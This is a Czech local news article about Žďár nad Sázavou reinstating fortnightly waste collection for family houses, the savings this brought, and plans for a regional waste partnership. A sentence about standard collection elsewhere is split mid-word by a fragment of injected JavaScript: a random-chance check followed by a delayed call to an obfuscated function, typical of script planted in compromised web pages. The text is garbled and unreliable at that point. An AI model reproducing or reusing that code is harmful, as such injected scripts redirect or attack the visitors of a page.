Rainbow page separator

Na omezení vývozu popelnic od rodinných domů město ušetřilo

Pondělí, 26. července 2021

Žďár nad Sázavou / Omezení týdenního svozu odpadů na interval čtrnácti dnů se ve žďárských ulicích s rodinnými domy vrátí od října. Podle radnice se tento pilotní projekt ke snížení stále se zvyšujících nákladů na odpadové hospodářství osvědčil, přičemž od loňského září do letošního května město ušetřilo 350 tisíc korun. Přes léto se odpadky od rodinných domů svážejí každý týden kvůli eliminaci případného zápachu z popelnic v teplém počasí. V ostatních částech Žďáru se popelnice a kontejnery vyváží standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardně jednou týdně.
Ještě letos má být dokončena aktualizace strategie nakládání s odpady a na základě té poté budou svozy veškerých odpadů ve městě řízeny. Žďárští obyvatelé zatím stále platí za svoz a zpracování komunálního odpadu 580 korun za osobu a rok, nicméně součástí strategie bude i vyhodnocení negativních dopadů nového zákona o odpadech na městskou kasu. Dalším krokem se stane založení Mikroregionu Žďársko – prioritně k řešení společné odpadové politiky regionu, tedy jak v ní dál pokračovat po roce 2030, kdy bude definitivně ukončeno skládkování. Obce z regionu sdružené v novém subjektu by měly společně postupovat v problematice odpadového hospodářství, od čehož si slibují silnější vyjednávací pozici.